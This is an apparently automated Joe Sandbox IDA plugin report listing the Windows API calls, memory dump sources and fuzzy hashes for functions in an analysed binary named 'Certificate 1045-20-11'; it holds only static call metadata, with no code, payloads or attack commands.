                                                                                • Instruction ID: b9671f93c5bf713ca3ca7a95bd68589ddba1c2b9bcce2bbeb61085b1dc6721e4
                                                                                • Opcode Fuzzy Hash: 2518edc41f641ecf546aac44d7b80fade1f34ddc23af4c71404105348a67b3f1
                                                                                • Instruction Fuzzy Hash: B2B1367990064ADFDB10CFA8C481BEEBBB1FF08345F149529EC59EB250DB30A955CB64
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 008A1C18
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 008A1C26
                                                                                • __wsplitpath.LIBCMT ref: 008A1C54
                                                                                  • Part of subcall function 00861DFC: __wsplitpath_helper.LIBCMT ref: 00861E3C
                                                                                • _wcscat.LIBCMT ref: 008A1C69
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 008A1CDF
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 008A1CF1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1380811348-0
                                                                                • Opcode ID: 68e926bd5c248cf47b1ab298cb8c3c03cfd31b648ff280ddded0e538de60640c
                                                                                • Instruction ID: 2bb201b9b7b54e3b131e8f322fd85b8e369a87113e4c0c080d732fea6cac3f48
                                                                                • Opcode Fuzzy Hash: 68e926bd5c248cf47b1ab298cb8c3c03cfd31b648ff280ddded0e538de60640c
                                                                                • Instruction Fuzzy Hash: 9B513B711043449FD720EF68D885EABB7E8FF89754F04492EF985D7251EB70A904CB92
                                                                                APIs
                                                                                  • Part of subcall function 008A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A30AF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008A30EF
                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008A3112
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008A313B
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008A317E
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 008A318B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 3451389628-0
                                                                                • Opcode ID: 5e7e56f4100ce6d2f9693e7e8a22b1cd67effad806616de4cf023fca90cf7771
                                                                                • Instruction ID: 43fe1a31553117ddea7ffe286464142c80e47dca40af0f6ef5523e1b5a3b0b46
                                                                                • Opcode Fuzzy Hash: 5e7e56f4100ce6d2f9693e7e8a22b1cd67effad806616de4cf023fca90cf7771
                                                                                • Instruction Fuzzy Hash: 33512531208308AFD714EF68C885E6ABBE9FF89314F04492DF595D72A1DB71EA05CB52
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 008A8540
                                                                                • GetMenuItemCount.USER32(00000000), ref: 008A8577
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008A859F
                                                                                • GetMenuItemID.USER32(?,?), ref: 008A860E
                                                                                • GetSubMenu.USER32(?,?), ref: 008A861C
                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 008A866D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                • String ID:
                                                                                • API String ID: 650687236-0
                                                                                • Opcode ID: 9c2eb1c8d53fc820003ccdda124a5ab440c8323024dc2284fbe978ee47dd5e07
                                                                                • Instruction ID: 14b7136dfdbe4ac7dd95d73a67477fa741cfadd02b48d6c22297bb374e748433
                                                                                • Opcode Fuzzy Hash: 9c2eb1c8d53fc820003ccdda124a5ab440c8323024dc2284fbe978ee47dd5e07
                                                                                • Instruction Fuzzy Hash: 96518B31E00219EFEB11EFA8C845AAEB7B5FF59310F104469E905FB351DB30AE418BA5
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00884B10
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00884B5B
                                                                                • IsMenu.USER32(00000000), ref: 00884B7B
                                                                                • CreatePopupMenu.USER32 ref: 00884BAF
                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00884C0D
                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00884C3E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                • String ID:
                                                                                • API String ID: 3311875123-0
                                                                                • Opcode ID: efa82d9a9301af66d16979e11cb47edd5b653c11971fd1d0b6a9a5968795b84e
                                                                                • Instruction ID: 1ee342213523dcf316f4dc6eeed8499f8b17af843d10ef64efe0e9ba7d469437
                                                                                • Opcode Fuzzy Hash: efa82d9a9301af66d16979e11cb47edd5b653c11971fd1d0b6a9a5968795b84e
                                                                                • Instruction Fuzzy Hash: 7B51ED7160130AEBDF20EFA8C888BADBBF9FF54318F145129E455DB291E3709944CB51
                                                                                APIs
                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,008DDC00), ref: 00898E7C
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898E89
                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00898EAD
                                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00898EC5
                                                                                • _strlen.LIBCMT ref: 00898EF7
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898F6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_strlenselect
                                                                                • String ID:
                                                                                • API String ID: 2217125717-0
                                                                                • Opcode ID: a4d1241fd3ec5d0db15c1ae7404ae00a27c0a8697847b8ace4a08a9953cc07b6
                                                                                • Instruction ID: 6ef3ad5d82307f6292a820c8bdbbf712494445bd40ad7888c4da18a0b87a9ae5
                                                                                • Opcode Fuzzy Hash: a4d1241fd3ec5d0db15c1ae7404ae00a27c0a8697847b8ace4a08a9953cc07b6
                                                                                • Instruction Fuzzy Hash: 7541C071500209ABCB04FBA8CD95EAEB7B9FF49314F144669F51AE7291DF30AE00CB61
APIs
  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
• BeginPaint.USER32(?,?,?), ref: 0085AC2A
• GetWindowRect.USER32(?,?), ref: 0085AC8E
• ScreenToClient.USER32(?,?), ref: 0085ACAB
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0085ACBC
• EndPaint.USER32(?,?,?,?,?), ref: 0085AD06
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008BE673
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• String ID:
• API String ID: 2592858361-0
• Opcode ID: c27c115ada05b4a20449e9f66edbcff497696d437d60f09750a3e498b4778456
• Instruction ID: 00dc9f76ed06c468dd8950af21f9836eda07944aedb4dea0ae6b45e9b4f57a47
• Opcode Fuzzy Hash: c27c115ada05b4a20449e9f66edbcff497696d437d60f09750a3e498b4778456
• Instruction Fuzzy Hash: 66417C711043019FC710EF28DC84FA67BF8FB69325F140669F9A5C72A1D731A849EB62
APIs
• ShowWindow.USER32(00901628,00000000,00901628,00000000,00000000,00901628,?,008BDC5D,00000000,?,00000000,00000000,00000000,?,008BDAD1,00000004), ref: 008AE40B
• EnableWindow.USER32(00000000,00000000), ref: 008AE42F
• ShowWindow.USER32(00901628,00000000), ref: 008AE48F
• ShowWindow.USER32(00000000,00000004), ref: 008AE4A1
• EnableWindow.USER32(00000000,00000001), ref: 008AE4C5
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008AE4E8
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: c1329e3927fd1c270e718d217f4b00551cfbfb4d1cf7f4d78fd0806c97e7ff3c
• Instruction ID: f21897c97a4c194a47879fea7d792bf3b2bcc9d860898e87d7f7b4896231378c
• Opcode Fuzzy Hash: c1329e3927fd1c270e718d217f4b00551cfbfb4d1cf7f4d78fd0806c97e7ff3c
• Instruction Fuzzy Hash: AD414034602941EFEB21DF24C499F947BF5FB4A304F1845B9EA58CF6A2C731A841CB95
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 008898D1
  • Part of subcall function 0085F4EA: std::exception::exception.LIBCMT ref: 0085F51E
  • Part of subcall function 0085F4EA: __CxxThrowException@8.LIBCMT ref: 0085F533
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00889908
• EnterCriticalSection.KERNEL32(?), ref: 00889924
• LeaveCriticalSection.KERNEL32(?), ref: 0088999E
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008899B3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 008899D2
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 2537439066-0
• Opcode ID: 05980d3b130e1327583df5c2d26de33a1dbd95eca920b5a4b57cdb092615c8d7
• Instruction ID: dda8eb4ec8e96ae392dbebb00d05977533af4472f15b8d05b2e8fc19f8e0dd4e
• Opcode Fuzzy Hash: 05980d3b130e1327583df5c2d26de33a1dbd95eca920b5a4b57cdb092615c8d7
• Instruction Fuzzy Hash: 0A316131900205ABDB10EFA8DC85EAEBB78FF44711B1480B9F904EB246E774DA14CBA5
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,008977F4,?,?,00000000,00000001), ref: 00899B53
  • Part of subcall function 00896544: GetWindowRect.USER32(?,?), ref: 00896557
• GetDesktopWindow.USER32 ref: 00899B7D
• GetWindowRect.USER32(00000000), ref: 00899B84
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00899BB6
  • Part of subcall function 00887A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887AD0
• GetCursorPos.USER32(?), ref: 00899BE2
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00899C44
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: f91257a94824dd5e548e1b62e6f3182299e3cd4f3a5c0260167c907add4ee3f5
• Instruction ID: a5d52e160cc4d5089e8ae75b54a825cf740fb31670da0b080bffcaa702b8d331
• Opcode Fuzzy Hash: f91257a94824dd5e548e1b62e6f3182299e3cd4f3a5c0260167c907add4ee3f5
• Instruction Fuzzy Hash: E431C172104315ABCB10EF58DC49F9AB7EDFF88314F04092AF599D7181D631E904CB92
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0087AFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 0087AFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0087AFC4
• CloseHandle.KERNEL32(00000004), ref: 0087AFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0087AFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 0087B012
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 27440063e29c191d48e3a6a42d310c4c428a9a3faceb9a4a13f0b9cbd6f449c8
• Instruction ID: 3b868c4f4d90fce2256bef48e1a4b811a2d9d8902b0387ba29a71f42799c9729
• Opcode Fuzzy Hash: 27440063e29c191d48e3a6a42d310c4c428a9a3faceb9a4a13f0b9cbd6f449c8
• Instruction Fuzzy Hash: 49214C7210530DABDB029FA8DD09FAE7BA9FB84304F048025FA05E2161D776DD21EB61
APIs
  • Part of subcall function 0085AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0085AFE3
  • Part of subcall function 0085AF83: SelectObject.GDI32(?,00000000), ref: 0085AFF2
  • Part of subcall function 0085AF83: BeginPath.GDI32(?), ref: 0085B009
  • Part of subcall function 0085AF83: SelectObject.GDI32(?,00000000), ref: 0085B033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 008AEC20
• LineTo.GDI32(00000000,00000003,?), ref: 008AEC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 008AEC42
• LineTo.GDI32(00000000,00000000,?), ref: 008AEC52
• EndPath.GDI32(00000000), ref: 008AEC62
• StrokePath.GDI32(00000000), ref: 008AEC72
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 138ab993961f2e36b6597232e4d393d223e2c6251eb953bf47730bbaea95f880
• Instruction ID: 15513ab569af7e206205d28123f301723efad5f60e3dc43096c10e3b76d81f88
• Opcode Fuzzy Hash: 138ab993961f2e36b6597232e4d393d223e2c6251eb953bf47730bbaea95f880
• Instruction Fuzzy Hash: E2111B7200024DBFEF029F94DC88EEA7F6DFB08360F048126BE088A160D7719D55DBA0
APIs
• GetDC.USER32(00000000), ref: 0087E1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0087E1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0087E1D8
• ReleaseDC.USER32(00000000,00000000), ref: 0087E1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0087E1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 0087E209
  • Part of subcall function 00879AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00879A05,00000000,00000000,?,00879DDB), ref: 0087A53A
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
• Opcode ID: f0ebb1c0eeb35ead1d71fc594a881bad2008533319a8dd0b387108643f4833c7
• Instruction ID: 6a620ac920711c675259acdc7b7bdd9fc32bbbb4fb58156cb95bc5736dc99e91
• Opcode Fuzzy Hash: f0ebb1c0eeb35ead1d71fc594a881bad2008533319a8dd0b387108643f4833c7
• Instruction Fuzzy Hash: 340184B5A00714BFEB10ABA59C45F5EBFB8FB48351F008066EA08E7290D6709C00CBA0
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 00867B47
                                                                                  • Part of subcall function 0086123A: __initp_misc_winsig.LIBCMT ref: 0086125E
                                                                                  • Part of subcall function 0086123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00867F51
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00867F65
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00867F78
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00867F8B
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00867F9E
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00867FB1
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00867FC4
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00867FD7
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00867FEA
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00867FFD
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00868010
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00868023
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00868036
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00868049
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0086805C
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0086806F
                                                                                • __mtinitlocks.LIBCMT ref: 00867B4C
                                                                                  • Part of subcall function 00867E23: InitializeCriticalSectionAndSpinCount.KERNEL32(008FAC68,00000FA0,?,?,00867B51,00865E77,008F6C70,00000014), ref: 00867E41
                                                                                • __mtterm.LIBCMT ref: 00867B55
                                                                                  • Part of subcall function 00867BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00867B5A,00865E77,008F6C70,00000014), ref: 00867D3F
                                                                                  • Part of subcall function 00867BBD: _free.LIBCMT ref: 00867D46
                                                                                  • Part of subcall function 00867BBD: DeleteCriticalSection.KERNEL32(008FAC68,?,?,00867B5A,00865E77,008F6C70,00000014), ref: 00867D68
                                                                                • __calloc_crt.LIBCMT ref: 00867B7A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00867BA3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 2942034483-0
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0084281D
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00842825
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00842830
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0084283B
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00842843
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084284B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 1423608774-0
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00887C07
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00887C1D
